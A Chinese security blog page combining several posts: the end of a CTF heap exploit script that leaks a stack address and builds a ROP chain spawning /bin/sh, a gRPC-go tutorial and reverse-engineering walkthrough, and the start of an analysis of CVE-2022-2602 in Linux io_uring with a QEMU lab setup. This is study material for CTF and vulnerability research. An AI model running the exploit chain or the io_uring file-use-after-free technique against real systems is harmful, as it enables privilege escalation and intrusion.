add(0x17,0x50,p64(stdout_addr)+p64(free_list_addr+0x60))
add(0x18,0x48,'\x80')
payload = stdout_leak(environ,environ+8)
add(0x19,0x48,payload)

ru(": ")
leak_addr = u64(p.recv(6).ljust(8,b'\x00'))
stack_addr = leak_addr - 0x140
success("leak_addr >> "+hex(leak_addr))
success("stack_addr >> "+hex(stack_addr))

pop_rax_ret = libc_base + 0x0000000000045eb0
pop_rdi_ret = libc_base + 0x000000000002a3e5
pop_rsi_ret = libc_base + 0x000000000002be51
pop_rdx_r12_ret = libc_base + 0x000000000011f2e7
syscall_addr = libc_base + 0x0000000000029db4
binsh_addr = libc_base + 0x1d8678

add(0x20,0x50,p64(stack_addr))
payload = p64(pop_rax_ret)+p64(59)
payload += p64(pop_rdi_ret)+p64(binsh_addr)
payload += p64(pop_rsi_ret)+p64(0)
payload += p64(pop_rdx_r12_ret)+p64(0)+p64(0)
payload += p64(syscall_addr)

#pause()
add(0x21,0x68,payload)

p.interactive()

RPC & gRPC

RPC 全称 Remote Procedure Call,中文译为远程过程调用

  • 使用 RPC 进行通信,调用远程函数就像调用本地函数一样
  • RPC 底层会做好数据的序列化与传输,从而能使我们更轻松地创建分布式应用和服务

gRPC 是RPC的一种,典型特征就是使用 protobuf 作为其 IDL 接口定义语言

  • 使用 gRPC,我们只需要定义好每个 API 的 Request 和 Response,剩下的 gRPC 这个框架会帮我们自动搞定

gRPC 的通信流程:

  • 定义IDL,即我们的接口文档(后缀为.proto)
  • 编译 proto 文件,得到存根(stub)文件
  • 服务端(gRPC Server)实现第一步定义的接口并启动,这些接口的定义在存根文件里面
  • 客户端借助存根文件调用服务端的函数,虽然客户端调用的函数是由服务端实现的,但是调用起来就像是本地函数一样

gRPC-go 基础知识

接下来用 go 语言写一个 gRPC 案例

先使用如下命令进行初始化:

1
go mod init go-test
  • “go-test” 为 module 名称,程序会生成一个 go.mod
1
go mod tidy
  • 更新依赖至最新版本,程序会更新 go.mod 条目并生成一个 go.sum

定义 protobuf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
syntax = "proto3";

package greeter.srv;

option go_package = "proto/greeter";

service Greeter { // 设置Greeter服务
rpc SayHello (HelloRequest) returns (HelloReply) {}
}

message HelloRequest { // 定义传参格式
string name = 1;
}

message HelloReply { // 定义返回格式
string message = 1;
}

将 proto 文件编译为存根文件:

1
protoc --proto_path=proto  --go_out=proto  --go_opt=paths=source_relative proto/greeter.proto
  • —proto_path:指定 import 路径
  • —go_out:指定输出文件路径
  • —go_opt:指定参数(paths=source_relative 表示生成文件输出使用相对路径)
  • 被编译的 .proto 文件放在最后面

也可以使用集成化工具 powerproto 来进行编译,安装方法如下:

1
go install github.com/storyicon/powerproto/cmd/powerproto@latest 
1
2
3
4
git clone https://github.com/storyicon/powerproto.git
cd powerproto
make
cp dist/powerproto-linux-amd64 /usr/local/bin/powerproto

powerproto 常用命令如下:

1
2
3
powerproto init /* 初始化 */
powerproto tidy /* 整理配置文件 */
powerproto build proto/greeter.proto /* 编译proto */
  • 初始化完成后会生成 powerproto.yaml 文件,在其中我们可以设置 proto 的版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
scopes:
- ./
protoc: v3.7.1 # 修改protoc版本
protocWorkDir: ""
plugins:
protoc-gen-go: google.golang.org/protobuf/cmd/protoc-gen-go@v1.26.0 # 修改protoc-gen-go版本
protoc-gen-go-grpc: google.golang.org/grpc/cmd/protoc-gen-go-grpc@v1.3.0 # 修改protoc-gen-go-grpc版本
repositories:
GOOGLE_APIS: https://github.com/googleapis/googleapis@75e9812478607db997376ccea247dd6928f70f45
options:
- --go_out=.
- --go_opt=paths=source_relative
- --go-grpc_out=.
- --go-grpc_opt=paths=source_relative
importPaths:
- .
- $GOPATH
- $POWERPROTO_INCLUDE
- $SOURCE_RELATIVE
- $GOOGLE_APIS/github.com/googleapis/googleapis
postActions: []
postShell: ""

编译完成后的存根文件部分代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
type GreeterServer interface {
SayHello(context.Context, *HelloRequest) (*HelloReply, error)
}
/* context.Context:上下文
HelloRequest:请求入参 */

type GreeterClient interface {
SayHello(ctx context.Context, in *HelloRequest, opts ...grpc.CallOption) (*HelloReply, error)
}
/* context.Context:上下文
HelloRequest:请求入参
grpc.CallOption:定义了before方法和after方法的接口 */
  • 定义了服务端和客户端关于模块函数的接口
  • 该接口对应的函数是定义在服务端上的,但客户端可以通过该接口来调用该函数

服务端 API 的实现:

1
2
3
4
5
6
7
8
9
10
11
12
var Greeter_ServiceDesc = grpc.ServiceDesc{ /* 创建一个ServiceDesc对象 */
ServiceName: "greeter.srv.Greeter", /* 服务名称 */
HandlerType: (*GreeterServer)(nil), /* 处理的结构体 */
Methods: []grpc.MethodDesc{ /* 一次响应的方法集 */
{
MethodName: "SayHello", /* 模块名称 */
Handler: _Greeter_SayHello_Handler, /* 对应的handler函数 */
},
},
Streams: []grpc.StreamDesc{},
Metadata: "proto/greeter.proto", /* 元数据,也就是proto文件 */
}
  • grpc.ServiceDesc 对象将会作为 RegisterService 的参数
1
2
3
func RegisterGreeterServer(s grpc.ServiceRegistrar, srv GreeterServer) {
s.RegisterService(&Greeter_ServiceDesc, srv)
}
  • RegisterService 为注册函数,将一个 grpc.ServiceDesc 对象注册到系统
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
func _Greeter_SayHello_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) {
in := new(HelloRequest) /* 开辟空间,存储客户端的请求数据 */
if err := dec(in); err != nil {
return nil, err
}
if interceptor == nil { /* 如果没有注册拦截器,则直接调用目标函数 */
return srv.(GreeterServer).SayHello(ctx, in)
}
info := &grpc.UnaryServerInfo{
Server: srv,
FullMethod: Greeter_SayHello_FullMethodName,
}
handler := func(ctx context.Context, req interface{}) (interface{}, error) {
return srv.(GreeterServer).SayHello(ctx, req.(*HelloRequest))
} /* 否则调用拦截器(目标函数也会注册到拦截器中) */
return interceptor(ctx, in, info, handler)
}
  • 核心点就是接收客户端的流对象,调用服务端上的函数并响应

客户端 API 的实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
type greeterClient struct { 
cc grpc.ClientConnInterface /* 定义了执行RPC方法对象需要实现的函数 */
}

func NewGreeterClient(cc grpc.ClientConnInterface) GreeterClient {
/* 创建一个客户端:
入参值:客户端和服务器端建立的连接
返回值:greeterClient结构体 */
return &greeterClient{cc} /* 相当于创建了一个greeterClient结构体(用传参cc初始化),然后将该结构体返回 */
}

func (c *greeterClient) SayHello(ctx context.Context, in *HelloRequest, opts ...grpc.CallOption) (*HelloReply, error) { /* 客户端接口的实现 */
out := new(HelloReply) /* 创建HelloReply结构体,用于返回数据 */
err := c.cc.Invoke(ctx, Greeter_SayHello_FullMethodName, in, out, opts...) /* 调用客户端连接的Inoke方法 */
if err != nil {
return nil, err
}
return out, nil
}
  • 客户端接口的核心步骤就是调用 Inoke 方法
1
2
3
4
5
6
7
type ClientConnInterface interface {
// Invoke performs a unary RPC and returns after the response is received
// into reply.
Invoke(ctx context.Context, method string, args any, reply any, opts ...CallOption) error
// NewStream begins a streaming RPC.
NewStream(ctx context.Context, desc *StreamDesc, method string, opts ...CallOption) (ClientStream, error)
}
1
2
3
4
5
6
7
8
9
10
func (cc *ClientConn) Invoke(ctx context.Context, method string, args, 
reply interface{}, opts ...CallOption) error {

opts = combine(cc.dopts.callOptions, opts) /* 把客户端的拦截器和和调用方法入参的拦截器合并 */
if cc.dopts.unaryInt != nil {
return cc.dopts.unaryInt(ctx, method, args, reply, cc, invoke, opts...)
}

return invoke(ctx, method, args, reply, cc, opts...)
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
func invoke(ctx context.Context, method string, req, reply interface{}, 
cc *ClientConn, opts ...CallOption) error {

cs, err := newClientStream(ctx, unaryStreamDesc, cc, method, opts...) /* 创建客户端流对象 */
if err != nil {
return err
}

if err := cs.SendMsg(req); err != nil { /* 发送请求 */
return err
}

return cs.RecvMsg(reply) /* 接受响应 */
}
  • 核心点就是创建客户端流对象,发送请求并且接受响应

PS:和 mustEmbedUnimplementedGreeterServer 相关的内容都是 protoc-gen-go-grpc 为 gRPC 设置的保护,可以直接删去

服务端代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
package main

import (
"context"
"fmt"
greeter "go-test/proto"
"log"
"net"

"google.golang.org/grpc"
)

type server struct {
}

func (s *server) SayHello(ctx context.Context, req *greeter.HelloRequest) (rsp *greeter.HelloReply, err error) {
rsp = &greeter.HelloReply{Message: "Hello " + req.Name}
return rsp, nil
}

func main() {
listener, err := net.Listen("tcp", ":52001")
if err != nil {
log.Fatalf("failed to listen: %v", err)
}
s := grpc.NewServer()
greeter.RegisterGreeterServer(s, &server{})

fmt.Println("gRPC server listen in 52001...")
err = s.Serve(listener)
if err != nil {
log.Fatalf("failed to serve: %v", err)
}
}

客户端代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
package main

import (
"context"
"fmt"
greeter "go-test/proto"
"log"
"time"

"google.golang.org/grpc"
)

func main() {
conn, err := grpc.Dial("127.0.0.1:52001", grpc.WithInsecure())
if err != nil {
log.Fatalf("connect failed: %v", err)
}

defer conn.Close()

c := greeter.NewGreeterClient(conn)

ctx, cancel := context.WithTimeout(context.Background(), time.Second*3)
defer cancel()

r, err := c.SayHello(ctx, &greeter.HelloRequest{Name: "World"})
if err != nil {
log.Fatalf("call service failed: %v", err)
}
fmt.Println("call service success: ", r.Message)
}

在客户端上调用 SayHello 函数(客户端上没有实现),客户端通过 gRPC 将请求数据发送到服务端,服务端执行完成以后将响应数据发回客户端

gRPC-go 逆向分析

对于无符号的 go 语言逆向,可以先使用 IDAGolangHelper 初步恢复符号,然后编译一个有符号的 go 语言程序并用 bindiff 再次恢复符号

由于 IDA7.7 对于 IDAGolangHelper 的兼容性不好,因此这里选择使用 AlphaGolang

  • PS:这里强烈推荐 AlphaGolang,分析出来的伪代码比带符号的都好看,另外它还有其他功能

接着就可以使用 pbtk 来从二进制文件中提取 proto 文件:

1
/pbtk/extractors/from_binary.py server
  • /pbtk/extractors/from_binary.py 会生成一个 .proto 文件(可能会报错,但还是生成了文件)
  • 生成的文件和源文件几乎没有区别

接下来我们需要利用 IDA 快速找到服务端为客户端定义的函数代码

在有符号的二进制文件中搜索函数名称,很容易就能找到该函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
retval_7E3C40 __golang main__ptr_server_SayHello(
main_server_0 *s,
context_Context_0 ctx,
go_test_proto_HelloRequest_0 *req)
{
int v3; // r14
int v4; // rax
runtime__type_0 *v5; // [rsp-28h] [rbp-38h]
runtime_tmpBuf *v6; // [rsp-28h] [rbp-38h]
string v7; // [rsp-20h] [rbp-30h]
string v8; // [rsp-10h] [rbp-20h]
uint8 *str; // [rsp+0h] [rbp-10h]
void *retaddr; // [rsp+10h] [rbp+0h] BYREF
retval_7E3C40 result; // [rsp+38h] [rbp+28h]

if ( (unsigned int)&retaddr <= *(_QWORD *)(v3 + 16LL) )
runtime_morestack_noctxt();
v7.str = (uint8 *)runtime_newobject(v5);
str = runtime_concatstring2(v6, v7, v8).str;
*((_QWORD *)str + 6LL) = "Hello ";
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrier();
else
*((_QWORD *)str + 5LL) = v4;
return result;
}

但该函数并没有直接被其他函数调用,我们必须通过其他方法找到其调用链:

1
Down	j	.text:00000000007E3CF2	jmp     main__ptr_server_SayHello

有一个方法就是找到注册函数 s.RegisterService(在无符号的情况下也适用):

1
2
3
4
5
6
7
8
.text:00000000007E3D80 E8 DB 59 FE FF                call    google_golang_org_grpc_NewServer
.text:00000000007E3D80
.text:00000000007E3D85 48 89 44 24 28 mov [rsp+68h+var_40], rax
.text:00000000007E3D8A 90 nop
.text:00000000007E3D8B 48 8B 0D 36 AD 18 00 mov rcx, cs:off_96EAC8
.text:00000000007E3D92 48 8D 1D 47 D6 46 00 lea rbx, go_test_proto_Greeter_ServiceDesc
.text:00000000007E3D99 48 8D 3D 50 7A 4A 00 lea rdi, runtime_zerobase
.text:00000000007E3DA0 E8 7B 5F FE FF call google_golang_org_grpc__ptr_Server_RegisterService
  • rax 为 NewServer 的返回值
  • rbx 为 ServiceDesc 对象
  • rcx 为定义的 interface 接口

我们需要的信息就在第二个参数 ServiceDesc 对象中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
type ServiceDesc struct {
ServiceName string
// The pointer to the service interface. Used to check whether the user
// provided implementation satisfies the interface requirements.
HandlerType any
Methods []MethodDesc
Streams []StreamDesc
Metadata any
}

type MethodDesc struct {
MethodName string
Handler methodHandler
}

type StreamDesc struct {
StreamName string
Handler StreamHandler

ServerStreams bool
ClientStreams bool
}
1
2
3
4
5
6
.data:0000000000C513E0                               public go_test_proto_Greeter_ServiceDesc
.data:0000000000C513E0 ; google_golang_org_grpc_ServiceDesc_0 go_test_proto_Greeter_ServiceDesc
.data:0000000000C513E0 9B EB 8C 00 00 00 00 00 13 00+go_test_proto_Greeter_ServiceDesc google_golang_org_grpc_ServiceDesc_0 <<offset aGreeterSrvGree, 13h>, <offset unk_80B520, 0>, <\
.data:0000000000C513E0 00 00 00 00 00 00 20 B5 80 00+ ; DATA XREF: main_main+92↑o
.data:0000000000C513E0 00 00 00 00 00 00 00 00 00 00+ offset off_C49860, 1, 1>, <offset regexp_arrayNoInts, 0, 0>, <\ ; "greeter.srv.Greeter" ...
.data:0000000000C513E0 00 00 60 98 C4 00 00 00 00 00+ offset unk_8221E0, offset off_C481A0>>
  • IDA 信息可能有点难看,这里直接看 GDB 调试信息(长度大小为 0x60)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pwndbg> telescope 0xc513e0
00:0000│ rbx 0xc513e0 —▸ 0x8cebfb ◂— 0x2e72657465657267 ('greeter.') /* ServiceName */
01:00080xc513e8 ◂— 0x13
02:00100xc513f0 —▸ 0x80b540 ◂— 0x8 /* HandlerType */
03:00180xc513f8 ◂— 0x0
04:00200xc51400 —▸ 0xc49860 —▸ 0x8c81dc ◂— 0x6f6c6c6548796153 ('SayHello') /* MethodDesc */
05:00280xc51408 ◂— 0x1
06:00300xc51410 ◂— 0x1
07:00380xc51418 —▸ 0xc8b4e0 ◂— 0x1010101010101 /* StreamDesc */
08:00400xc51420 ◂— 0x0
09:00480xc51428 ◂— 0x0
0a:00500xc51430 —▸ 0x822200 ◂— 0x10 /* Metadata */
0b:00580xc51438 —▸ 0xc481a0 —▸ 0x8cedd6 ◂— 0x72672f6f746f7270 ('proto/gr')
0c:00600xc51440 —▸ 0x8c4889 ◂— 0x6956696156435455 ('UTCVaiVi')
0d:00680xc51448 ◂— 0x3
1
2
3
4
5
6
pwndbg> telescope 0xc49860 /* MethodDesc */
00:00000xc49860 —▸ 0x8c81dc ◂— 0x6f6c6c6548796153 ('SayHello') /* MethodName */
01:00080xc49868 ◂— 0x8
02:00100xc49870 —▸ 0x900b28 —▸ 0x7e3860 ◂— cmp rsp, qword ptr [r14 + 10h] /* Handler */
03:00180xc49878 ◂— 0x0
... ↓ 4 skipped
  • 在 Handler 中可以找到目标函数

之前我们已经分析了存根文件中的 Handler 函数,但是在 IDA 逆向时发现其有很大不同:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
retval_7E3860 __golang go_test_proto__Greeter_SayHello_Handler(
interface__0 srv,
context_Context_0 ctx,
funcinterface__error dec,
google_golang_org_grpc_UnaryServerInterceptor interceptor)
{
retval_7E3A60 (__golang *v4)(context_Context_0, interface__0); // rax
retval_7E3A60 (__golang *v5)(context_Context_0, interface__0); // rbx
__int64 (**v6)(void); // rsi
void (*v7)(context_Context_0, interface__0, google_golang_org_grpc_UnaryServerInfo_0 *, google_golang_org_grpc_UnaryHandler, interface__0 *, error_0 *); // r8
int v8; // r14
retval_7E3A60 (__golang **v9)(context_Context_0, interface__0); // rax
retval_7E3A60 (__golang **v10)(context_Context_0, interface__0); // rax
int v11; // rax
runtime__type_0 *v12; // [rsp-30h] [rbp-50h]
runtime_interfacetype_0 *v13; // [rsp-30h] [rbp-50h]
runtime__type_0 *v14; // [rsp-30h] [rbp-50h]
runtime__type_0 *v15; // [rsp-28h] [rbp-48h]
retval_7E3A60 (__golang *v16)(context_Context_0, interface__0); // [rsp+10h] [rbp-10h]
void *retaddr; // [rsp+20h] [rbp+0h] BYREF
google_golang_org_grpc_UnaryServerInterceptor interceptora; // [rsp+50h] [rbp+30h]
retval_7E3860 result; // [rsp+58h] [rbp+38h]

if ( (unsigned int)&retaddr <= *(_QWORD *)(v8 + 16LL) )
runtime_morestack_noctxt();
interceptora = v7;
v16 = v4;
v15 = (runtime__type_0 *)runtime_newobject(v12);
if ( !(*v6)() )
{
if ( interceptora )
{
runtime_newobject(&v13->typ);
*v9 = v16;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrierDX();
else
v9[1LL] = v5;
v9[3LL] = (retval_7E3A60 (__golang *)(context_Context_0, interface__0))29LL;
v9[2LL] = (retval_7E3A60 (__golang *)(context_Context_0, interface__0))"/greeter.srv.Greeter/SayHello";
runtime_newobject(v14);
*v10 = go_test_proto__Greeter_SayHello_Handler_func1;
v10[1LL] = v16;
if ( *(_DWORD *)&runtime_writeBarrier.enabled )
runtime_gcWriteBarrierR9();
else
v10[2LL] = v5;
(*(void (**)(void))interceptora)(); /* 调用interceptor(注册的拦截器) */
}
else
{
runtime_assertE2I(v13, v15);
(*(void (**)(void))(v11 + 24LL))(); /* 调用目标函数 */
}
}
return result;
}
  • 通过调试即可找到目标函数的具体地址:
1
0x7e39ce    call   rdx                           <0x7e3c40> /* main__ptr_server_SayHello */

CVE-2022-2602

1
Linux version 5.13.1 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 11.4.0-2ubuntu1~20.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Wed Mar 13 11:24:24 CST 2024
1
2
3
4
5
6
7
8
9
10
11
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot -s
  • smap,smep,pti,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -t devpts devpts /dev/pts

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

io_uring 模块

io_uring 会把要内核做的 io 操作都放在一个队列里,内核空闲的时候就会从任务队列里拿你给它的 io 任务去完成,等你觉得内核做完了你给它的 io 任务的时候,你就去结果队列里取结果就行了

提交任务的环叫 SQ,里面的每个任务叫 SQE,获取结果的环叫 CQ,里面的每个结果叫 CQE

io_uring 的具体实现是通过下面三个系统调用:

  • io_uring_setup:初始化 io_uring
    • 初始化 io_uring 的两个环形队列(SQ,CQ)
    • 为 io_uring 创建一个文件对象(后续使用这个文件描述符映射出内存,来访问两个队列和创建相关资源)
  • io_uring_enter:通知内核任务已经提交或获取任务结果
    • 任务发送和结果接收需要使用 io_uring_enter
    • io_uring 提供了一个轮训模式 IORING_SETUP_SQPOLL,在该模式下,内核会自动取检查任务队列里是否有新任务并去完成,而不需要我们去调用 io_uring_enter 系统调用(底层使用了内核线程)
  • io_uring_register:注册共享缓冲区
    • 将文件描述符或内存区域与 io_uring 关联起来

安装 liburing 生成 liburing.a / liburing.so.2.2:

1
2
3
wget https://github.com/axboe/liburing/archive/liburing-2.2.zip
make
sudo make install

liburing 中会提供一些 io_uring API:

1
2
3
#include <liburing.h>

struct io_uring_sqe *io_uring_get_sqe(struct io_uring *ring);
  • 从属于 ring 参数的提交队列中获取下一个可用的提交队列条目
  • 成功时返回一个指向提交队列条目的指针,失败时返回 NULL
1
2
3
#include <liburing.h>

int io_uring_submit(struct io_uring *ring);
  • 将下一个事件提交到属于 ring 的提交队列
  • 成功时返回提交的提交队列条目数,失败时返回 -errno

调用者先使用 io_uring_get_sqe 检索提交队列条目,然后初始化 SQE(可以通过 API 辅助填写),最后使用 io_uring_submit 提交

用于提交请求的 io_uring_enter 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit, u32,
min_complete, u32, flags, const void __user *, argp, size_t,
argsz)
{

......

if (ctx->flags & IORING_SETUP_SQPOLL) {

......

} else if (to_submit) {
ret = io_uring_add_task_file(ctx);
if (unlikely(ret))
goto out;
mutex_lock(&ctx->uring_lock);
submitted = io_submit_sqes(ctx, to_submit); /* 核心函数 */
mutex_unlock(&ctx->uring_lock);

if (submitted != to_submit)
goto out;
}
if (flags & IORING_ENTER_GETEVENTS) {

......

}

out:
percpu_ref_put(&ctx->refs);
out_fput:
fdput(f);
return submitted ? submitted : ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static int io_submit_sqes(struct io_ring_ctx *ctx, unsigned int nr)
{
int submitted = 0;

/* make sure SQ entry isn't read before tail */
nr = min3(nr, ctx->sq_entries, io_sqring_entries(ctx));

if (!percpu_ref_tryget_many(&ctx->refs, nr))
return -EAGAIN;

percpu_counter_add(&current->io_uring->inflight, nr);
refcount_add(nr, &current->usage);
io_submit_state_start(&ctx->submit_state, nr);

while (submitted < nr) { /* 处理所有请求 */
const struct io_uring_sqe *sqe; /* 代表一个SQE(提交任务) */
struct io_kiocb *req;

req = io_alloc_req(ctx);
if (unlikely(!req)) {
if (!submitted)
submitted = -EAGAIN;
break;
}
sqe = io_get_sqe(ctx); /* 获取用户传入的io_uring_sqe结构体 */
if (unlikely(!sqe)) {
kmem_cache_free(req_cachep, req);
break;
}
/* will complete beyond this point, count as submitted */
submitted++;
if (io_submit_sqe(ctx, req, sqe)) /* 核心函数(处理提交任务) */
break;
}

if (unlikely(submitted != nr)) {
int ref_used = (submitted == -EAGAIN) ? 0 : submitted;
struct io_uring_task *tctx = current->io_uring;
int unused = nr - ref_used;

percpu_ref_put_many(&ctx->refs, unused);
percpu_counter_sub(&tctx->inflight, unused);
put_task_struct_many(current, unused);
}

io_submit_state_end(&ctx->submit_state, ctx);
/* Commit SQ ring head once we've consumed and submitted all SQEs */
io_commit_sqring(ctx);

return submitted;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
static int io_submit_sqe(struct io_ring_ctx *ctx, struct io_kiocb *req,
const struct io_uring_sqe *sqe)
{
/* 这里的io_uring_sqe由用户设置并传入 */
struct io_submit_link *link = &ctx->submit_state.link;
int ret;

ret = io_init_req(ctx, req, sqe); /* 初始化提交任务(将sqe中的信息填写到req中) */
if (unlikely(ret)) {
fail_req:
if (link->head) {
/* fail even hard links since we don't submit */
link->head->flags |= REQ_F_FAIL_LINK;
io_req_complete_failed(link->head, -ECANCELED);
link->head = NULL;
}
io_req_complete_failed(req, ret);
return ret;
}
ret = io_req_prep(req, sqe); /* 准备调用任务,这里会进行文件权限的判断 */
if (unlikely(ret))
goto fail_req;

/* don't need @sqe from now on */
trace_io_uring_submit_sqe(ctx, req->opcode, req->user_data, true,
ctx->flags & IORING_SETUP_SQPOLL);

/*
* If we already have a head request, queue this one for async
* submittal once the head completes. If we don't have a head but
* IOSQE_IO_LINK is set in the sqe, start a new head. This one will be
* submitted sync once the chain is complete. If none of those
* conditions are true (normal request), then just queue it.
*/
if (link->head) {
struct io_kiocb *head = link->head;

/*
* Taking sequential execution of a link, draining both sides
* of the link also fullfils IOSQE_IO_DRAIN semantics for all
* requests in the link. So, it drains the head and the
* next after the link request. The last one is done via
* drain_next flag to persist the effect across calls.
*/
if (req->flags & REQ_F_IO_DRAIN) {
head->flags |= REQ_F_IO_DRAIN;
ctx->drain_next = 1;
}
ret = io_req_prep_async(req);
if (unlikely(ret))
goto fail_req;
trace_io_uring_link(ctx, req, head);
link->last->link = req;
link->last = req;

/* last request of a link, enqueue the link */
if (!(req->flags & (REQ_F_LINK | REQ_F_HARDLINK))) {
io_queue_sqe(head);
link->head = NULL;
}
} else {
if (unlikely(ctx->drain_next)) {
req->flags |= REQ_F_IO_DRAIN;
ctx->drain_next = 0;
}
if (req->flags & (REQ_F_LINK | REQ_F_HARDLINK)) {
link->head = req;
link->last = req;
} else {
io_queue_sqe(req); /* 尝试执行提交任务 */
}
}

return 0;
}
  • 这里先检查了文件的权限,然后调用 io_queue_sqe 执行如下的调用链
1
io_queue_sqe->__io_queue_sqe->io_issue_sqe
  • 在 io_issue_sqe 中会根据 req->opcode 来调用不同的函数进行处理,在这些函数中可能会因为 inode 锁而陷入阻塞
  • 由于之前已经完成的权限检查,如果在阻塞时 file 结构体被非法释放,就可能存在 DirtyFile 的风险

初始化提交任务的 io_init_req 函数源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
const struct io_uring_sqe *sqe)
{
struct io_submit_state *state;
unsigned int sqe_flags;
int personality, ret = 0;

req->opcode = READ_ONCE(sqe->opcode);
/* same numerical values with corresponding REQ_F_*, safe to copy */
req->flags = sqe_flags = READ_ONCE(sqe->flags);
req->user_data = READ_ONCE(sqe->user_data);
req->async_data = NULL;
req->file = NULL;
req->ctx = ctx;
req->link = NULL;
req->fixed_rsrc_refs = NULL;
/* one is dropped after submission, the other at completion */
atomic_set(&req->refs, 2);
req->task = current;
req->result = 0;
req->work.creds = NULL;

/* enforce forwards compatibility on users */
if (unlikely(sqe_flags & ~SQE_VALID_FLAGS))
return -EINVAL;
if (unlikely(req->opcode >= IORING_OP_LAST))
return -EINVAL;
if (unlikely(!io_check_restriction(ctx, req, sqe_flags)))
return -EACCES;

if ((sqe_flags & IOSQE_BUFFER_SELECT) &&
!io_op_defs[req->opcode].buffer_select)
return -EOPNOTSUPP;

personality = READ_ONCE(sqe->personality);
if (personality) {
req->work.creds = xa_load(&ctx->personalities, personality);
if (!req->work.creds)
return -EINVAL;
get_cred(req->work.creds);
}
state = &ctx->submit_state;

/*
* Plug now if we have more than 1 IO left after this, and the target
* is potentially a read/write to block based storage.
*/
if (!state->plug_started && state->ios_left > 1 &&
io_op_defs[req->opcode].plug) {
blk_start_plug(&state->plug);
state->plug_started = true;
}

if (io_op_defs[req->opcode].needs_file) {
bool fixed = req->flags & REQ_F_FIXED_FILE; /* REQ_F_FIXED_FILE其实就是用户态传入的IOSQE_FIXED_FILE,代表ctx拥有file结构体 */

req->file = io_file_get(state, req, READ_ONCE(sqe->fd), fixed);
if (unlikely(!req->file))
ret = -EBADF;
}

state->ios_left--;
return ret;
}
  • 当用户态传入 io_uring_sqe->flags = IOSQE_FIXED_FILE 时,此时的 io_uring_sqe->fd 不再是 io_uring 需要处理的文件描述符,而是代表了 skb->fp->fp 中对应文件描述符的下标
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
static struct file *io_file_get(struct io_submit_state *state,
struct io_kiocb *req, int fd, bool fixed)
{
struct io_ring_ctx *ctx = req->ctx;
struct file *file;

if (fixed) {
unsigned long file_ptr;

if (unlikely((unsigned int)fd >= ctx->nr_user_files))
return NULL;
fd = array_index_nospec(fd, ctx->nr_user_files);
file_ptr = io_fixed_file_slot(&ctx->file_table, fd)->file_ptr; /* 通过索引计算出file结构体的地址 */
file = (struct file *)(file_ptr & FFS_MASK);
file_ptr &= ~FFS_MASK;
/* mask in overlapping REQ_F and FFS bits */
req->flags |= (file_ptr << REQ_F_ASYNC_READ_BIT);
io_req_set_rsrc_node(req);
} else {
trace_io_uring_file_get(ctx, fd);
file = __io_file_get(state, fd); /* __io_file_get中会直接调用fget(fd)获取file结构体 */

/* we don't allow fixed io_uring files */
if (file && unlikely(file->f_op == &io_uring_fops))
io_req_track_inflight(req);
}

return file;
}

用于注册的 io_uring_register 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)
{
struct io_ring_ctx *ctx;
long ret = -EBADF;
struct fd f;

f = fdget(fd);
if (!f.file)
return -EBADF;

ret = -EOPNOTSUPP;
if (f.file->f_op != &io_uring_fops)
goto out_fput;

ctx = f.file->private_data;

io_run_task_work();

mutex_lock(&ctx->uring_lock);
